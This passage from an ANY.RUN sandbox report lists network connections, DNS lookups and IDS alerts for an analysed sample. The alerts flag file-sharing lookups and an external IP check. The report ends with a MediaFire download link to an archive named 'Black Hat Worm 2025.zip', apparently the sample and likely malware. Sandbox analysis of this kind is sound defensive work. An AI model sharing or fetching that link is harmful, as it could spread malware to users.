172.64.149.23:80
http://ocsp.sectigo.com/
unknown
whitelisted
POST
200
184.24.77.54:80
http://r10.o.lencr.org/
unknown
whitelisted
POST
200
2.16.241.15:80
http://e6.o.lencr.org/
unknown
whitelisted
5116
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/canonical.html
unknown
whitelisted
5116
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/success.txt?ipv4
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
5116
firefox.exe
34.107.221.82:80
detectportal.firefox.com
GOOGLE
US
whitelisted
5116
firefox.exe
104.17.150.117:443
www.mediafire.com
CLOUDFLARENET
whitelisted
5116
firefox.exe
34.160.144.191:443
content-signature-2.cdn.mozilla.net
GOOGLE
US
whitelisted
34.36.137.203:443
contile.services.mozilla.com
whitelisted
216.58.206.74:443
safebrowsing.googleapis.com
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.6
whitelisted
google.com
  • 142.250.185.174
  • 142.250.185.206
whitelisted
www.mediafire.com
  • 104.17.150.117
  • 104.17.151.117
whitelisted
detectportal.firefox.com
  • 34.107.221.82
whitelisted
prod.detectportal.prod.cloudops.mozgcp.net
  • 34.107.221.82
  • 2600:1901:0:38d7::
whitelisted
content-signature-2.cdn.mozilla.net
  • 34.160.144.191
whitelisted
prod.content-signature-chains.prod.webservices.mozgcp.net
  • 34.160.144.191
  • 2600:1901:0:92a9::
whitelisted
example.org
  • 23.215.0.132
  • 23.215.0.133
  • 96.7.128.192
  • 96.7.128.186
whitelisted
ipv4only.arpa
  • 192.0.0.170
  • 192.0.0.171
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Potentially Bad Traffic
ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup
2196
svchost.exe
Potentially Bad Traffic
ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup
2196
svchost.exe
Potentially Bad Traffic
ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup
2196
svchost.exe
Potentially Bad Traffic
ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Requests to a free CDN for open source projects (jsdelivr .net)
2196
svchost.exe
Potentially Bad Traffic
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (download .mediafire .com)
2196
svchost.exe
Potentially Bad Traffic
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (download .mediafire .com)
2196
svchost.exe
Potentially Bad Traffic
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (download .mediafire .com)
2196
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io)
3240
svchost.exe
Device Retrieving External IP Address Detected
ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://www.mediafire.com/file/qslvw7hg7v7k41d/Black+Hat+Worm+2025.zip/file